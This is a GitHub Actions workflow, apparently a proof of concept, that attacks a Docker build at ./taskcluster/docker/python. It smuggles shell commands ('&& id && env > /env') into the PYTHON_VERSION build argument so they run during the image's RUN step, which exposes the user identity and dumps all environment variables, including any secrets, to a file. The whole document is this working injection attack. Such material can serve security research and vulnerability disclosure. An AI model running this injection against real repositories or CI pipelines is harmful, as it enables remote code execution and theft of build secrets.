name: Exploit PYTHON_VERSION
on: push

jobs:
  hack:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2

      - name: Trigger RCE via PYTHON_VERSION
        run: |
          # Use a valid base image but inject code into a RUN command
          MALICIOUS_ARG="3.11-alpine && echo 'HACKED: ' && id && env > /env"
          docker build \
            --build-arg PYTHON_VERSION="$MALICIOUS_ARG" \
            -t hacked \
            ./taskcluster/docker/python
